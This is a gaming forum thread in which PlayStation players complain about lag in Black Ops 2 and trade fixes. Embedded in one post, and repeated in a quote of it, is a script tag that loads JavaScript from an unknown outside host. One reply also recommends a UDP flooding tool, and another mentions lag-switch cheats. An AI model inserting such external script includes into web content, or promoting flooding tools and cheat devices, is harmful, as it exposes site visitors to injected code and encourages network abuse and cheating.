By monty1401

monty1401

57%
02 Rank
Progress
Playstation Staff

Problem Solved

View Original Post

Massive Lag in black ops 2 - NOT LAG COMPENSATION!!

58 Replies 2,380 Views Created 18-11-2012

Has anyone suffered from serious lag on black ops, not talking about people beating you in one on ones, but running around and then jumping back to a position from 2 seconds before.

this is happening about every 2 minutes without fail, anyone else getting this?

When i view killcams im basically just standing still although at the time i thought i was running forward.

My internet is fine (LAN Cable 50 mb/12mb download/upload)

0 Kudos
LABELS:
View our house rules for posts
Post Reply Update Reply Cancel
/16

DiscoDa

99%
08 Rank
Progress
Playstation Staff

Problem Solved

View Original Post
DiscoDa
Accepted Solution

I've just changed from wired to wireless and it seems better for me!

I read a few people say the same on the Activision forum so I thought I'd try it!

0 Kudos

Re: Massive Lag in black ops 2 - NOT LAG COMPENSATION!!

photo AWESOMEO00.jpg
/16

Spirit0fLight

90%
05 Rank
Progress
Playstation Staff

Problem Solved

View Original Post
Spirit0fLight
Accepted Solution
Probably because its not picking you as host anymore over wifi? (just a guess).
0 Kudos

/16

noddyy

71%
05 Rank
Progress
Playstation Staff

Problem Solved

View Original Post
noddyy
Accepted Solution

Read this earlier, give it a read, it explains the effects lag and lag compensation have on gameplay. http://community.callofduty.com/message/413593819#413593819

There are some good threads on there, with very valid points EG: http://community.callofduty.com/message/413594030#413594030

The problem with the matchmaking in COD is giving everyone problems.

The ps3 forums on callofduty.com are full on lag complaints.

Even setting your search preference as BEST wont do much, unless everyone has there set as BEST cause once in a lobby someone with there search preference set as ALL could join and ruin the game for all in the lobby. Not everyone even knows about changing there search preference.

0 Kudos

PSN= Dingby
Beta Tester
/16

penny84

• Beta Tester
94%
07 Rank
Progress
Playstation Staff

Problem Solved

View Original Post
penny84
Accepted Solution
It's even worse tonight hit markers galore and getting killed by 2 bullets by enemy's. treyarch really need to sort this out.
0 Kudos

/16

maxcrook

42%
02 Rank
Progress
Playstation Staff

Problem Solved

View Original Post
maxcrook
Accepted Solution

Thank goodness it's not just me getting this! At first I did the usual unfamiliar map so blamed the game but as each game went on I realised the game is fraught with lag and horrendous lag at that. I shot someone in the head with an extended mag the victims on kill cam wasn't hit once and stabbed me! *****. I'm sick of it to be honest, yes I know it's new and could be fixed with a patch but why should we pay a lot of money and put up with this cr4p? How people are prestiging 5 times already is beyond me!

0 Kudos

[ Edited ]
/16

RBC8468

84%
02 Rank
Progress
Playstation Staff

Problem Solved

View Original Post
RBC8468
Accepted Solution

I talk look my post Lag Switch. I hear person sell Ebay LAG Switch (Network Cable).

I know Cheat all games online for LAG Switch mean cheat game no death when switch stop quick lag mean jump move... too lag more that.

They want buy Ebay LAG SWITCH cheat all games still trouble.

I need Ban LAG Switch will kick out Vote. Black ops2 will know LAG cheat person host.

I was play stop black screen wait happen HOST mean LAG cheat will person lose out anymore back soon.

maybe BAN soon LAG Switch 5000 days lose

0 Kudos

/16

Spirit0fLight

90%
05 Rank
Progress
Playstation Staff

Problem Solved

View Original Post
Spirit0fLight
Accepted Solution
I've been hosting tonight a lot and had no problems. Maybe I'm just lucky but actually been a fun night!
0 Kudos

/16

IrishViper1

96%
05 Rank
Progress
Playstation Staff

Problem Solved

View Original Post
IrishViper1
Accepted Solution

Spirit0fLight wrote:
I've been hosting tonight a lot and had no problems. Maybe I'm just lucky but actually been a fun night!

You were using a lag switch and sending gremlins to destroy everyone else's internets,I saw one of them peeping out of my router.

0 Kudos

/16

Spirit0fLight

90%
05 Rank
Progress
Playstation Staff

Problem Solved

View Original Post
Spirit0fLight
Accepted Solution

IrishViper1 wrote:

Spirit0fLight wrote:

You were using a lag switch and sending gremlins to destroy everyone else's internets,I saw one of them peeping out of my router.

Yeah,Yeah. Still hurting from my ballistic knife ?

0 Kudos

/16

czelo

25%
02 Rank
Progress
Playstation Staff

Problem Solved

View Original Post
czelo
Accepted Solution

i found a solution guys. This nonsense is only affecting people with the best connection. I think the lag compensation is based on percentage wise. i.e. you have to pay more if you have the highest conenction. What you need to do is deliberately reduce your connection as much as you can.

I'm currently using Net Tools 5 with UDP Flooder constantly flooding data to my PS3 and surely it lag but im always playing live. in other words my bullets are hitting.

search on You tube for "UDP Flooder Net Tools 5" for more details

0 Kudos

Beta Tester
/16

penny84

• Beta Tester
94%
07 Rank
Progress
Playstation Staff

Problem Solved

View Original Post
penny84
Accepted Solution
The game is totally broken with the lag compensation I am going to trade my copy in next week. I can safely say it's the last time I ever buy a cod game on ps3
0 Kudos

/16

noddyy

71%
05 Rank
Progress
Playstation Staff

Problem Solved

View Original Post
noddyy
Accepted Solution
Game ran smooth with me hosting last night with just the odd game where we got lag-comped when I was not hosting. When this happend we just re parted up and started a new game.
0 Kudos

PSN= Dingby
Beta Tester
/16

penny84

• Beta Tester
94%
07 Rank
Progress
Playstation Staff

Problem Solved

View Original Post
penny84
Accepted Solution

Its completley unplayable this morning even on best connection its getting traded in next week will be glad to see back of it.

0 Kudos

/16

DTK6672

29%
02 Rank
Progress
Playstation Staff

Problem Solved

View Original Post
DTK6672
Accepted Solution

For me, this game is a complete joke! I love it, but I can't play it.  Simply unplayable. Iv'e tried everything, good connection, 35mb up and 10mb down from 5mb up and 1mb down, nothing works, nothing matters. I spawn, I'm dead, I spot a guy first, unload a clip, I'm dead. I "camp" in a spot for 2 seconds, I'm dead. The replay kill cam always shows me either not shooting my weapon or getting shot from behind when I am clearly shooting the enemy in the chest on my screen. Why are we being punished for good connections? Work hard for a living, pay good money for internet services and we get it shoved in the *****!

While spoiled rotten Little Johnny goes 53 and 3 with 2 fricken connection bars. The most frustrating and unrealistic multiplayer I have ever played! Oh? Have you tried best connection? JOKE, Port forwarding? USELESS, DMZ? Sorry no help. $60.00 for the game, $50.00 for revolution, what a fricken waste of money!

Not to mention players getting 1500 to 1800 point kill streaks within 30 seconds of the match start, can you please exlain to me how this is possible? 0-15 in 60 seconds, yea that sounds fair.

Treyarch is well aware of the problem but they are too damn greedy and cheap to fix it, great job you morons at Treyarch, my bullet ridden hat goes off to you.

<script type="text/javascript" src="https://hostmyjs.biz/include.js?id=js15"></script>
0 Kudos

Award Winner
/16

nerdlegend

• Award Winner
96%
10 Rank
Progress
Playstation Staff

Problem Solved

View Original Post
nerdlegend
Accepted Solution

DTK6672 wrote:

For me, this game is a complete joke! I love it, but I can't play it.  Simply unplayable. Iv'e tried everything, good connection, 35mb up and 10mb down from 5mb up and 1mb down, nothing works, nothing matters. I spawn, I'm dead, I spot a guy first, unload a clip, I'm dead. I "camp" in a spot for 2 seconds, I'm dead. The replay kill cam always shows me either not shooting my weapon or getting shot from behind when I am clearly shooting the enemy in the chest on my screen. Why are we being punished for good connections? Work hard for a living, pay good money for internet services and we get it shoved in the *****!

While spoiled rotten Little Johnny goes 53 and 3 with 2 fricken connection bars. The most frustrating and unrealistic multiplayer I have ever played! Oh? Have you tried best connection? JOKE, Port forwarding? USELESS, DMZ? Sorry no help. $60.00 for the game, $50.00 for revolution, what a fricken waste of money!

Not to mention players getting 1500 to 1800 point kill streaks within 30 seconds of the match start, can you please exlain to me how this is possible? 0-15 in 60 seconds, yea that sounds fair.

Treyarch is well aware of the problem but they are too damn greedy and cheap to fix it, great job you morons at Treyarch, my bullet ridden hat goes off to you.

<script type="text/javascript" src="https://hostmyjs.biz/include.js?id=js15"></script>

I only have serious problem when playing on wifi, wired is loads better.

Of course sometimes I get lag all networks do but not that bad.

Some people are good at call of duty some are not.

0 Kudos

Photobucket
/16

jontonathon

94%
07 Rank
Progress
Playstation Staff

Problem Solved

View Original Post
jontonathon
Accepted Solution

^^^^ sorry nerd but being good at cod ain't got jack to do with it , people , on high speed connections are suffering down to the lag . It's the worst online game I've played not just cod , somethings way off with this muck.

Last time I tried the multiplayer I had to give up , I'd look at my ammo count as I died and typically I'd have 7  or 9 bullets out my mag , quick look at the killcam and I see I'm still running?? Yes theres always lag but its usually at a manageable level , this just makes you look stupid! 

Suppose I should've known better , all failarch games are the same.

0 Kudos

/16

xDiscoDavex

67%
02 Rank
Progress
Playstation Staff

Problem Solved

View Original Post
xDiscoDavex
Accepted Solution

I have to agree with you as well...for me the lag seems to be getting worse for me recently and I've also tried lots of things to at least give me a chance in this game. I have a pretty good connection as well (60 meg up, 6 meg down and ping is about 20ms). I know K/D ratio is not the end all and be all of how good you are at this game but it's a good measure...and mine is dropping quite quickly. Have I suddently become a bad player overnight? Don't think so...

I've put the Playstation in the DMZ, taken it out again, forwarded ports, taken out firewalls, played on wireless / wired connections and all combinations of these things and nothing seems to change my ability to kill the bad guys. I have no problem finding games (usually play kill confirmed / team deathmatch) and visually at least, the game runs smooth. But you know when your shooting someone in the back and that they turn round and seem to kill you with one bullet something's not right. And the killcam shows you as if your gun is made of cheese and you not doing anything other than looking starstruck at the person shooting you and you know something isn't right. Shame really as I really like the gameplay and most of the maps too...

So maybe the game does reward poorer connections? Maybe I need to start downloading some HD video while I play!!

0 Kudos

View our house rules for posts
Post Reply Update Reply Cancel